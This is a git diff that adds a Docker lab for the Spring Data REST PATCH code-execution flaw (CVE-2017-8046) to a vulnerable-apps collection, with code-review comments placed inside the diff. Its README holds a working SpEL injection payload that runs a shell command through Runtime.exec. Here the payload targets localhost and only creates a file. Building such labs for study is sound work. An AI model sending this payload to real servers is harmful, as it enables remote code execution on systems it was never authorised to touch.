diff --git a/README.md b/README.md
index 1720398..29a68ff 100644
--- a/README.md
+++ b/README.md
@@ -114,6 +114,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 * [Samba](./s/samba/)
 * [Shiro](./s/shiro/)
 * [SSH](./s/ssh/)
+* [Spring](./s/spring/)
 * [Spring Boot](./s/springboot/)
 * [Struts2](./s/struts2/)
 * [Spring WebFlow](./s/springwebflow/)
diff --git a/s/README.md b/s/README.md
index 452798e..a5c2dd3 100644
--- a/s/README.md
+++ b/s/README.md
@@ -3,6 +3,7 @@
 * [Samba](./samba/)
 * [Shiro](./shiro/)
 * [SSH](./ssh/)
+* [Spring](./spring/)
 * [Spring Boot](./springboot/)
 * [Struts2](./struts2/)
 * [Spring WebFlow](./springwebflow/)
diff --git a/s/spring/1/Dockerfile b/s/spring/1/Dockerfile
new file mode 100644
index 0000000..2a556e4
--- /dev/null
+++ b/s/spring/1/Dockerfile
@@ -0,0 +1,15 @@
+FROM openjdk:8-jdk
+MAINTAINER Medici.Yan@Gmail.com
+
+ENV JAR_URL http://vulapps.poetn.cc/s/spring/spring-data-rest/spring-data-rest-cve-2017-8046.jar
+
+COPY src/start.sh /start.sh
+
+RUN set -x \
+ && chmod a+x /start.sh \
+ && mkdir /htdocs \
+ && wget -qO /htdocs/ROOT.jar $JAR_URL
+
+EXPOSE 8080
+
+CMD ["/start.sh"]
diff --git a/s/spring/1/README.md b/s/spring/1/README.md
new file mode 100644
index 0000000..3d8b290
--- /dev/null
+++ b/s/spring/1/README.md
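Review bot: The RUN step in s/spring/1/Dockerfile fetches the application JAR over plain HTTP from `$JAR_URL` with no integrity check, so every build of this image trusts whatever that host or the network path returns; for a lab image that is meant to be vulnerable in exactly one documented way, an unverified download is a second, unintended trust boundary. Pin the artifact by appending `&& echo "<SHA256_OF_JAR_PLACEHOLDER>  /htdocs/ROOT.jar" | sha256sum -c -` to the `&&` chain so a swapped or truncated download fails the build instead of silently producing a different image. `MAINTAINER` is deprecated; `LABEL maintainer="Medici.Yan@Gmail.com"` is the current form. The service also runs as root because no `USER` is set, which is worth a one-line comment if it is deliberate for the PoC.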
@@ -0,0 +1,68 @@
+## Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)
+
+### 漏洞信息
+
+ * [CVE-2017-8046: RCE in PATCH requests in Spring Data REST](https://pivotal.io/security/cve-2017-8046)
+ * [这个Spring高危漏洞,你修补了吗?-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA)
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:s_spring_1
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8080:8080 medicean/vulapps:s_spring_1
+ ```
+ > `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。
+
+### 使用与利用
+
+访问 `http://你的 IP 地址:端口号/`, 假设启动的端口号为 8080
+
+#### PoC
+
+1. 访问 `http://127.0.0.1:8080/`,测试服务是否启动成功
+
+ > 第一次启动时会下载 mongodb,网速慢的可能要多等一会儿
+
+ ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-1.png)
+
+2. 利用 POST 请求添加一个数据
+
+ ```
+ POST /persons HTTP/1.1
+ Host: 127.0.0.1:8080
+ Content-Type: application/json
+ Cache-Control: no-cache
+
+ {"firstName": "VulApps", "lastName": "VulApps"}
+ ```
+ ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-2.png)
+
+3. 执行 PoC
+
+ 执行命令为: `/usr/bin/touch /tmp/vuln`,注意 Content-Type 值为 `application/json-patch+json`
+
+```
+PATCH /persons/1 HTTP/1.1
+Host: 127.0.0.1:8080
+Content-Type: application/json-patch+json
+Cache-Control: no-cache
+Content-Length: 228
+
+[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,47,116,109,112,47,118,117,108,110}))/lastName", "value": "vulapps-demo" }]
+```
+ ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-3.png)
+
+4. 进入容器,发现成功创建文件
+
+ ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-4.png)
+
+### 参考链接
+
+* [这个Spring高危漏洞,你修补了吗?-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA)
diff --git a/s/spring/1/poc-1.png b/s/spring/1/poc-1.png
new file mode 100644
index 0000000..4fc2e03
Binary files /dev/null and b/s/spring/1/poc-1.png differ
diff --git a/s/spring/1/poc-2.png b/s/spring/1/poc-2.png
new file mode 100644
index 0000000..dd04ea7
Binary files /dev/null and b/s/spring/1/poc-2.png differ
diff --git a/s/spring/1/poc-3.png b/s/spring/1/poc-3.png
new file mode 100644
index 0000000..ea680f9
Binary files /dev/null and b/s/spring/1/poc-3.png differ
diff --git a/s/spring/1/poc-4.png b/s/spring/1/poc-4.png
new file mode 100644
index 0000000..f77c9bd
Binary files /dev/null and b/s/spring/1/poc-4.png differ
diff --git a/s/spring/1/src/start.sh b/s/spring/1/src/start.sh
new file mode 100644
index 0000000..d543b3d
--- /dev/null
+++ b/s/spring/1/src/start.sh
@@ -0,0 +1,5 @@
+#!/bin/bash
+while [[ true ]]; do
+ java -jar /htdocs/ROOT.jar
+ sleep 5
+done
diff --git a/s/spring/README.md b/s/spring/README.md
new file mode 100644
index 0000000..287ce19
--- /dev/null
+++ b/s/spring/README.md
@@ -0,0 +1,3 @@
+# Spring
+
+* [Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)](./1/)
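Review bot: `while [[ true ]]; do` in s/spring/1/src/start.sh loops only because `[[ ]]` treats any non-empty string as true, not because `true` is run; the idiomatic and less surprising form is `while true; do`. Because the script is the container's `CMD`, bash stays PID 1 with `java` as a child, so a `docker stop` SIGTERM most likely never reaches the JVM and the container is killed after the grace period rather than shut down cleanly. If the restart-on-exit loop is deliberate (the README notes the first start downloads mongodb and may take a while), say so with a comment such as `# restart the service if it exits; first start downloads mongodb` above the loop; otherwise `exec java -jar /htdocs/ROOT.jar` with restart policy left to Docker is the cleaner shape.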